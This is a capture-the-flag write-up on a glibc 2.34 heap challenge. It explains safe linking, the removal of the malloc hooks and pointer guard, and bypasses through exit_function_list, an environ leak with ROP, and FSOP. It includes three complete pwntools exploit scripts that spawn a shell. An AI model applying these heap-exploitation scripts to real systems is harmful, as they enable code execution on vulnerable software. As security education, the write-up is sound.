Rating: 5.0

This challenge is a fairly standard heap challenge. The binary provides the standard four functions:

- Allocate an arbitrary sized chunk (it seems to state that up to 100 chunks can be allocated, but this isn't checked anywhere)
- Free a previously allocated chunk. The pointer to the chunk is not zeroed, so we have UAF/double free here.
- Edit a previously allocated chunk. We can edit the metadata of a freed chunk to achieve arbitrary read/write.
- View the contents of a previously allocated chunk. We can use this to leak libc (via unsorted bin pointers) and heap (via tcache pointers)

Seems fairly standard, right? I've written writeups about these kinds of heap challenges [here](https://api.ctflib.junron.dev/share/writeup/gradebook-13). The twist here is the challenge runs glibc 2.34, which includes several mitigations that make the techniques detailed in the previous writeup impossible.

Thus, this writeup will explore the mitigations introduced after glibc 2.31 and several methods to bypass them.

## Safe linking

In regular tcache poisoning, we can freely overwrite tcache pointers to achieve arbitrary read/write. In glibc 2.32, safe linking was introduced to "encrypt" the pointers in the tcache and fastbins to make it more difficult to manipulate these pointers. The code for encrypting the pointer can be found [here](https://elixir.bootlin.com/glibc/glibc-2.34/source/malloc/malloc.c#L350):

```c
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
```

`pos` is the address where the pointer will be stored, and `ptr` is the pointer. Essentially the pointer is XORed with the page number of the page it is stored in. Since most of the pointers we are concerned about will be stored in the heap, we just need to leak the page number of one of the chunks in the heap. This is easy as we can just leak the (encrypted) tcache pointers and do some math to recover the original pointer:

```py
def deobfuscate(val):
mask = 0xfff << 52
while mask:
v = val & mask
val ^= (v >> 12)
mask >>= 12
return val
```

(Code from [here](https://ctftime.org/writeup/34804))

Once we have obtained the original pointer, we can just XOR it with the encrypted value to recover the key.

## Removal of hooks

Glibc 2.34 removed `__malloc_hook` and `__free_hook`, two important hooks that allowed us to obtain `$rip` control with a single arbitrary write.

There are actually multiple approaches to bypass this protection. I will discuss the method I used, as well as two other methods I have seen in other's solve scripts:

- The method I used: writing to `exit_function_list ` (based on [here](https://ctftime.org/writeup/34804) with tweaks)
- The method used by Triacontakai of ViewSource: leak stack + ROP
- The method used by the challenge author: File stream oriented programming

## Exit function list

Note: this technique is heavily based on [this writeup](https://ctftime.org/writeup/34804)

Similarly to `__malloc_hook`, the `__exit_funcs` variable in glibc contains information about what functions to call when a certain operation occurs, in this case on program exit.

The [`__exit_funcs`](https://elixir.bootlin.com/glibc/glibc-2.34/source/stdlib/cxa_atexit.c#L76) variable points to a [`exit_function_list`](https://elixir.bootlin.com/glibc/glibc-2.34/source/stdlib/exit.h#L55) struct, which in turn contains [`exit_function`](https://elixir.bootlin.com/glibc/glibc-2.34/source/stdlib/exit.h#L34)s.

```c
struct exit_function
{
/* `flavour' should be of type of the `enum' above but since we need
this element in an atomic operation we have to use `long int'. */
long int flavor;
union
{
void (*at) (void);
struct
{
void (*fn) (int status, void *arg);
void *arg;
} on;
struct
{
void (*fn) (void *arg, int status);
void *arg;
void *dso_handle;
} cxa;
} func;
};
```

There are three different types of `exit_function` (`at`, `on` and `cxa`). Since our goal is to call `system("/bin/sh")`, the `cxa` variant seems most applicable as the first argument is a pointer. The 'flavor' is represented by the number 4.

Fortunately, the [default `exit_function_list`](https://elixir.bootlin.com/glibc/glibc-2.34/source/stdlib/cxa_atexit.c#L75) is at a constant offset in libc, so we can simply allocate a chunk there and overwrite the `fn` pointer right

(Un)fortunately, glibc has implemented an additional protection: pointer guard. This sounds similar to the safe linking mechanism but relies on a secret key instead of the memory location of the pointer to be encrypted.

This is implemented [here](https://elixir.bootlin.com/glibc/glibc-2.34/source/sysdeps/unix/sysv/linux/x86_64/sysdep.h#L406) and implemented in the linked writeup in python as:

```py
# The shifts are copied from the above blogpost
# Rotate left: 0b1001 --> 0b0011
rol = lambda val, r_bits, max_bits: \
(val << r_bits%max_bits) & (2**max_bits-1) | \
((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

# encrypt a function pointer
def encrypt(v, key):
return p64(rol(v ^ key, 0x11, 64))
```

The key is actually stored in memory in the [thread control block (TCB)](https://elixir.bootlin.com/glibc/glibc-2.34/source/sysdeps/x86_64/nptl/tls.h#L52), the same place that stack canaries are stored:

```c
typedef struct
{
void *tcb; /* Pointer to the TCB. Not necessarily the
thread descriptor used by libpthread. */
dtv_t *dtv;
void *self; /* Pointer to the thread descriptor. */
int multiple_threads;
int gscope_flag;
uintptr_t sysinfo;
uintptr_t stack_guard;
uintptr_t pointer_guard; // <------ this is the field we are interested in
unsigned long int unused_vgetcpu_cache[2];
/* Bit 0: X86_FEATURE_1_IBT.
Bit 1: X86_FEATURE_1_SHSTK.
*/
unsigned int feature_1;
int __glibc_unused1;
/* Reservation of some values for the TM ABI. */
void *__private_tm[4];
/* GCC split stack support. */
void *__private_ss;
/* The lowest address of shadow stack, */
unsigned long long int ssp_base;
/* Must be kept even if it is no longer used by glibc since programs,
like AddressSanitizer, depend on the size of tcbhead_t. */
__128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));

void *__padding[8];
} tcbhead_t;
```

After some searching with GDB, I found the offset of the TCB from the libc address.

From here, I used the previously established arbitrary write primitive to zero out the `pointer_guard`. Fortunately, the address was 16 byte aligned so there was no problem allocating a chunk there.

With the pointer guard key zeroed out, we just need to rotate the address of `system` left by `0x11` bits to pass the pointer mangling. Now, we can just write this 'mangled' address to the `fn` of `exit_function` struct set the `arg` to a pointer to `/bin/sh` (a chunk I allocated on the heap). Thus, `system("/bin/sh")` is called when the program exits.

Unfortunately, this requires two writes, which is somewhat more complicated than traditional heap UAF pwn. The original writeup actually recovers the key by leaking the obfuscated `fn` value, which is known to correspond to `_dl_fini`. Unfortunately, the address of `fn` was not 16 byte aligned in this case, so we cannot allocate a chunk on that address. Unfortunately, allocating a chunk 8 bytes before the desired address and filling the 8 bytes with padding will not work as `fgets` adds a null terminator to the end of the written string. However, if `read` was used instead, this technique would be feasible, only requiring one fake chunk.

```py
from pwn import *

e = ELF("./chal")
libc = ELF("libc.so.6", checksec=False)
ld = ELF("ld-linux-x86-64.so.2", checksec=False)
context.binary = e

def setup():
p = e.process()
return p

def alloc(p, i, size, s):
p.recvuntil(">")
p.sendline("1")
p.recvuntil("index")
p.sendline(str(i))
p.recvuntil("big")
p.sendline(str(size))
p.recvuntil("payload")
p.sendline(s)
def edit(p, i, s):
p.recvuntil(">")
p.sendline("3")
p.recvuntil("index")
p.sendline(str(i))
p.recvuntil("contents")
p.sendline(s)
def free(p,i):
p.recvuntil(">")
p.sendline("2")
p.recvuntil("index")
p.sendline(str(i))
def view(p,i):
p.recvuntil(">")
p.sendline("4")
p.recvuntil("index")
p.sendline(str(i))
(p.recvline())
return p.recvline(keepends=False)[2:]

def defu(p):
d = 0
for i in range(0x100,0,-4):
pa = (p & (0xf << i )) >> i
pb = (d & (0xf << i+12 )) >> i+12
d |= (pa ^ pb) << i
return d

def obfuscate(p, adr):
return p^(adr>>12)

rol = lambda val, r_bits, max_bits: \
(val << r_bits%max_bits) & (2**max_bits-1) | \
((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

if __name__ == '__main__':
p = setup()

for i in range(2):
alloc(p, i, 30, str(i))

for i in range(2,4):
alloc(p, i, 100, str(i))
alloc(p, 5, 0x1000, b"unsort")
alloc(p, 6, 100, b"buffer")
alloc(p, 7, 100, b"/bin/sh")
for i in range(6):
free(p, i)
l = view(p,1)
l = defu(u64(l+b"\0\0"))

libc_leak = u64(view(p, 5)+b"\0\0")
libc.address = libc_leak - 0x1f2cc0
print(hex(libc.address))

# First write fs:30 to zero out encryption key
target_heap_addr = l + 30
# Location where fs:30 is stored
target_addr = libc.address - 0x2890
edit(p, 1, p64(obfuscate(target_addr, target_heap_addr)))

alloc(p, 0, 30, b"aa")
# Write fs:30
alloc(p, 0, 30, b"\0"*20)

# Second write
target_heap_addr2 = l + 0xd0
target_addr2 = libc.address + 0x1f4bc0
edit(p, 3, p64(obfuscate(target_addr2, target_heap_addr2)))
alloc(p, 0, 100, b"aa")
bin_sh = l + 0x11c0
onexit_fun = p64(0) + p64(1) + p64(4) +p64(rol(libc.sym.system, 0x11, 64)) + p64(bin_sh) + p64(0)
alloc(p, 0, 100, onexit_fun)

# exit
p.sendline("5")
p.sendline("id")

p.interactive()
```

## Stack leak + ROP

This technique was used by `Triacontakai` in https://discord.com/channels/820012263845920768/823257424088924201/1036404972130152478.

This is perhaps the simplest of the methods detailed here, but also requires two fake chunks.

First, the glibc `environ` symbol is leaked. This symbol contains a stack address (the address of the third argument of `main`, `char **envp`).

This is actually nontrivial. The author allocates chunks of data size 24 bytes, which produces chunks of size 0x20. This is the smallest possible glibc heap chunk size.

Next, the author performs the typical tcache poisoning attack. However, instead of allocating chunks of size 24, the author allocates chunks of data size 0. As 0x20 is the smallest chunk size, `malloc(0)` returns chunks from the `0x20` size tcache. However, `0` is also the size passed to `fgets`, so no data is written to the target `environ` chunk, not even the null byte, allowing its value to be read subsequently.

Once the `environ` is leaked, the author calculates a target chunk so that when `malloc` is called in `menu_malloc`, it returns a pointer to the saved `rip` of the function. This allows the author to write their ROP 'ret2libc' payload, while bypassing the stack guard completely.

Their solve script is reproduced below:

```py
import re
import sys
from pwn import *

path = './pwnme'
host = '0.cloud.chals.io'
port = 10605

libc = ELF('./libc.so.6')

if len(sys.argv) > 1:
p = gdb.debug(path, '''
c
''', api=True, aslr=True)
else:
p = remote(host, port)

def b():
p.gdb.interrupt_and_wait()
input("press any key to resume")
def numb(num):
return str(num).encode('ascii')

def alloc(idx, size, data):
p.sendlineafter(b'> ', b'1')
p.sendlineafter(b'> ', numb(idx))
p.sendlineafter(b'> ', numb(size))
p.sendlineafter(b'> ', data)

def delete(idx):
p.sendlineafter(b'> ', b'2')
p.sendlineafter(b'> ', numb(idx))

def edit(idx, data):
p.sendlineafter(b'> ', b'3')
p.sendlineafter(b'> ', numb(idx))
p.sendlineafter(b'> ', data)

def view(idx):
p.sendlineafter(b'> ', b'4')
p.sendlineafter(b'> ', numb(idx))
return p.recvuntil(b'You are', drop=True)

# allocate unsorted bin chunk for libc leak
alloc(0, 0x420, b'AAAAAAAA')

# allocate tcache size chunk for heap leak
# this also prevents unsorted bin chunk from coalescing on free
alloc(1, 24, b'BBBBBBBB')

# allocate another 0x20 size chunk for poisoning later
alloc(2, 24, b'CCCCCCCC')

# free 0x20 size chunks into tcache
# looks like this:
# [2] -> [1]
delete(1)
delete(2)

# free unsorted bin size chunk to put libc address
delete(0)

# get heap leak
leak = u64(view(1)[:-1].ljust(8, b'\x00'))
heap = leak << 12
log.info(f"heap base: 0x{heap:x}")

# get libc leak
leak = u64(view(0)[:-1].ljust(8, b'\x00'))
libc.address = leak - (0x7f1d52750cc0 - 0x7f1d5255e000)
log.info(f"libc base: 0x{libc.address:x}")

# do tcache poisoning
mask = heap >> 12
edit(2, p64(mask ^ libc.symbols['environ']))

# allocate two chunks
# second chunk will be environ chunk
alloc(2, 0, b'')
alloc(2, 0, b'')

# get stack leak
stack = u64(view(2)[:-1].ljust(8, b'\x00'))
log.info(f"stack leak: 0x{stack:x}")

# offset stack leak to return address location
stack -= 336 + 8

# do poisoning again to get write on stack woohoo im having so much fun
alloc(1, 0x40-8, b'')
alloc(2, 0x40-8, b'')
delete(1)
delete(2)
edit(2, p64(mask ^ stack))

pop_rdi = libc.address + 0x000000000002daa2
binsh = next(libc.search(b'/bin/sh\x00'))

payload = b'A' * 8
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(libc.symbols['system'])

alloc(2, 0x40-8, b'')
alloc(2, 0x40-8, payload)

p.interactive()
```

## File stream oriented programming

This is the technique used by the challenge author. In my opinion, it is far more complicated than the other two techniques.

It still requires two fake chunks, and requires editing one of the chunks twice. The chunks sizes allocated are also quite large. After so much trouble, I'm not sure what the advantages of this method are over the others.

Anyway, I've done some FSOP [here](https://api.ctflib.junron.dev/share/writeup/manipulation-57), but this is significantly more complex.

To summarize, each file stream (like `stdout`) has an [`_IO_FILE_plus`](https://elixir.bootlin.com/glibc/glibc-2.34/source/libio/libioP.h#L324) struct which contains a [`_IO_FILE` ](https://elixir.bootlin.com/glibc/glibc-2.34/source/libio/bits/types/struct_FILE.h#L49) and a pointer to a vtable. By manipulating the function pointers in the vtable, we can control RIP. The attack then pops a shell via a one gadget.

This method is similar to that, except the one gadgets we have in this libc have fairly strict conditions, and I couldn't find a function pointer that I could overwrite with a one gadget that would work.

The challenge author uses [`_IO_OVERFLOW`](https://elixir.bootlin.com/glibc/glibc-2.34/source/libio/libioP.h#L146), which is called by [`_IO_flush_all_lockp`](https://elixir.bootlin.com/glibc/glibc-2.34/source/libio/genops.c#L685) on process exit as part of the cleanup process.

Unfortunately, `_IO_flush_all_lockp` will be called whenever file streams are flushed, which as it turns out is quite a lot.

However, `_IO_OVERFLOW` is only called if specific conditions are met:

```c
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
|| (_IO_vtable_offset (fp) == 0
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
)
&& _IO_OVERFLOW (fp, EOF) == EOF)
```

`_IO_OVERFLOW` will only be called if either of the first two conditions in the if statement return true.

To start, the author allocates a large fake chunk over `_IO_2_1_stdout_`. Using this fake chunk, they modify `fp->mode` to be greater than 0, and `fp->_IO_write_ptr` to be greater than `fp->_IO_write_base`.

The second condition of the if statement (`fp->_mode > 0`) will not be called as `fp->_wide_data->_IO_write_ptr == fp->_wide_data->_IO_write_base == 0 `.

Thus, by setting `fp->_mode > 0`, premature execution of `_IO_OVERFLOW` is prevented. Unfortunately, this also causes output to be disabled.

Next, the author allocates another large chunk on `__GI__IO_file_jumps`, the [file vtable](https://elixir.bootlin.com/glibc/glibc-2.34/source/libio/libioP.h#L293). The author modifies the `__overflow` field to the one gadget address. However, since the first argument of `_IO_OVERFLOW` is the file pointer, which we have write access to, I decided to use `system`, instead of a one gadget.

Once the vtable is manipulated, I modified the `_IO_2_1_stdout_` object again to set the `_flags` field to `/bin/sh`. Since `_flags` is at the start of the file object, when `_IO_OVERFLOW` is called, `_flags` will be the string that is passed to `system`. We could not do this beforehand as messing up the file flags would cause a crash. The `fp->_mode` field is set to `-1` so that the checks can pass and allow `_IO_OVERFLOW` to be called.

Now, all that's left is to command the process to exit and `system(_IO_2_1_stdout_)` will be called, which is equivalent to `system("/bin/sh")`.

Modified solve script:

```py
from pwn import *
from time import sleep
import re

p=process("./chal")
libc = ELF("./libc.so.6")
elf=ELF("./chal")

def malloc(ind, size, payload):
global p
r1 = p.sendlineafter(b">", "1")
r2 = p.sendlineafter(b">", str(ind))
r3 = p.sendlineafter(b">", str(size))
r4 = p.sendlineafter(b">",payload)
return r1+r2+r3+r4

def malloc_no_out(ind, size, payload):
global p
sleep(1)
p.sendline("1")
sleep(1)
p.sendline(str(ind))
sleep(1)
p.sendline(str(size))
sleep(1)
p.sendline(payload)

def free(ind):
global p
r1 = p.sendlineafter(b">", "2")
r2 = p.sendlineafter(b">", str(ind))
return r1 + r2

def free_no_out(ind):
global p
sleep(1)
p.sendline("2")
sleep(1)
p.sendline(str(ind))
sleep(1)

def edit(ind, payload):
global p
r1 = p.sendlineafter(b">","3")
r2 = p.sendlineafter(b">",str(ind))
r3 = p.sendlineafter(b">",payload)
return r1+r2+r3

def edit_no_out(ind, payload):
global p
sleep(1)
p.sendline("3")
sleep(1)
p.sendline(str(ind))
sleep(1)
p.sendline(payload)

def view(ind):
global p
r1 = p.sendlineafter(b">", "4")
r2 = p.sendlineafter(b">", str(ind))
leak = p.recvuntil(b"addresses.");
return leak

def raw2leak(resp):
leakr=resp[1:].split(b"\n")[0]
return u64(leakr.ljust(8, b'\x00'))

def decrypt(leak):
key=0
res=0
for i in range(1,6):
bits=64-12*i
if bits < 0:
bits = 0
res = ((leak ^ key) >> bits) << bits
key = res >> 12
return res

#GOAL 0: make a glibc leak by creating an unsorted size then a buffer chunk and freeing the big one:
print(malloc(50, 0x420, "hi there"))
print(malloc(51, 24, "smol"))
print(free(50))
raw = view(50)
leakr=raw[1:].split(b"\n")[0]
glibcleak = u64(leakr.ljust(8, b'\x00'))
libc.address = glibcleak - (libc.sym.main_arena+96)
one_gadget = 0xda811 + libc.address
filler = libc.sym._IO_2_1_stdout_ - 131
stdout_FILE = (p64(filler)*4
+ p64(filler + 1)*2
+ p64(filler)
+ p64(filler + 1)
+ p64(0)*4
+ p64(libc.sym._IO_2_1_stdin_)
+ p64(1)
+ p64(0xffffffffffffffff)
+ p64(0x0)
+ p64(libc.sym._IO_stdfile_1_lock)
+ p64(0xffffffffffffffff)
+ p64(0)
+ p64(libc.sym._IO_wide_data_1)
+ p64(0x0)*3 )

#OK targeting _IO_2_1_stdout_ -16 or -32

malloc(0, 0x368, "chunk0")
malloc(1, 0x368, "chunk1")
malloc(2, 0x378, "chunk2")
malloc(3, 0x378, "chunk3")
malloc(4, 24, "smol2")
free(0)
free(1)
free(2)
free(3)
print("commencing heap leak")
heapleap = decrypt(raw2leak(view(1)))
heapleap = (heapleap >> 12) << 12
print(hex(heapleap))
print("target stdout", hex(libc.sym._IO_2_1_stdout_))
print("target file jumps", hex(libc.sym.__GI__IO_file_jumps))
edit(1, p64( (libc.sym._IO_2_1_stdout_) ^ (heapleap >> 12)) + p64(heapleap) )
edit_no_out(3, p64( (libc.sym.__GI__IO_file_jumps) ^ (heapleap >> 12)) + p64(heapleap) )

malloc(5, 0x368, "junk")
malloc(6, 0x378, "junk2")
print("wait for it...")

malloc(7, 0x368, p64(0xfbad2887) + stdout_FILE + p32(2) + p32(0) )

gi_jump = (p64(0)*2 +
p64(libc.sym._IO_new_file_finish)+
p64(libc.sym.system)+#p64(libc.sym._IO_new_file_overflow)+
p64(libc.sym._IO_new_file_underflow)+
p64(libc.sym.__GI__IO_default_uflow)+
p64(libc.sym.__GI__IO_default_pbackfail)+
p64(libc.sym._IO_new_file_xsputn)+
p64(libc.sym.__GI__IO_file_xsgetn)+
p64(libc.sym._IO_new_file_seekoff)+
p64(libc.sym._IO_default_seekpos)+
p64(libc.sym._IO_new_file_setbuf)+
p64(libc.sym._IO_new_file_sync)+
p64(libc.sym.__GI__IO_file_doallocate)+
p64(libc.sym.__GI__IO_file_read)+
p64(libc.sym._IO_new_file_write)+
p64(libc.sym.__GI__IO_file_seek)+

p64(libc.sym.__GI__IO_file_close)+
p64(libc.sym.__GI__IO_file_stat)+
p64(libc.sym._IO_default_showmanyc)+
p64(libc.sym._IO_default_imbue))
malloc_no_out(8, 0x378, gi_jump)

edit_no_out(7, b"/bin/sh\0" + stdout_FILE+p32(0xffffffff))
print("ready")
p.sendline("5")
p.interactive()
```

Original writeup (https://api.ctflib.junron.dev/share/writeup/wide-open-59).